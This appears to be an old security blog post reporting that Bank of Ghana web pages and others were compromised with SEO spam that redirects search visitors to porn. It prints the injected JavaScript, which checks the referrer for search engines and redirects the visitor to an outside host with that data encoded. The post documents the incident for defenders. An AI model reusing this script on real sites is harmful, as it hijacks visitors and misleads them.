Skip to main content

Bank of Ghana, others, compromised

The Bank of Ghana is serving porn.

A Yahoo search brings up some startling results (thumbnailed due to highly graphic content):

http://www.sunbelt-software.com/ihs/alex/bankofghana1238888_thumb.jpg

(opens in new tab)

Narrowing down the search a wee bit:

http://www.sunbelt-software.com/ihs/alex/ghana0_10912332_thumb.jpg

(opens in new tab)

Ouch, nasty stuff.

These pages redirect to porn (graphic content).

http://www.sunbelt-software.com/ihs/alex/ghanaresults1299123_thumb.jpg

(opens in new tab)

The code looks for referrals from search engines. Example:

http://rainbowdisplays(dot)com/xxxxx/fetish(dot)js

function f(){

var r=document.referrer,t="",q;

if(r.indexOf("google.")!=-1)t="q";

if(r.indexOf("msn.")!=-1)t="q";

if(r.indexOf("yahoo.")!=-1)t="p";

if(r.indexOf("altavista.")!=-1)t="q";

if(r.indexOf("aol.")!=-1)t="query";

if(r.indexOf("ask.")!=-1)t="q";

if(r.indexOf("comcast.")!=-1)t="q";

if(r.indexOf("bellsouth.")!=-1)t="string";

if(r.indexOf("netscape.")!=-1)t="query";

if(r.indexOf("mywebsearch.")!=-1)t="searchfor";

if(r.indexOf("peoplepc.")!=-1)t="q";

if(r.indexOf("starware.")!=-1)t="qry";

if(r.indexOf("earthlink.")!=-1)t="q";

if(t.length&&((q=r.indexOf("?"+t+"="))!=-1(q=r.indexOf("&"+t+"="))!=-1))

window.location=("http://grandsupport(dot)net/td/in(dot)cgi?13&seoref="+encodeURIComponent(document.referrer)+ "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=fetish");

}window.onFocus = f()

This loads the site grandsupport(dot)net

Let’s hope they get this cleaned up soon (we have notified them).

Alex is a technology CEO, with leadership, operating partner, investor, and board member roles at security firms including AutoLoop, Borland, Quarterdeck (now Symantec and Cisco WebEx), GFI/TeamViewer, Sunbelt Software (now ThreatTrack Security), BlueStripe Software, StopBadware, Knowbe4, Malwarebytes, and Runaware Holding AB. When CEO of Sunbelt he ran a security blog, and he still writes on security.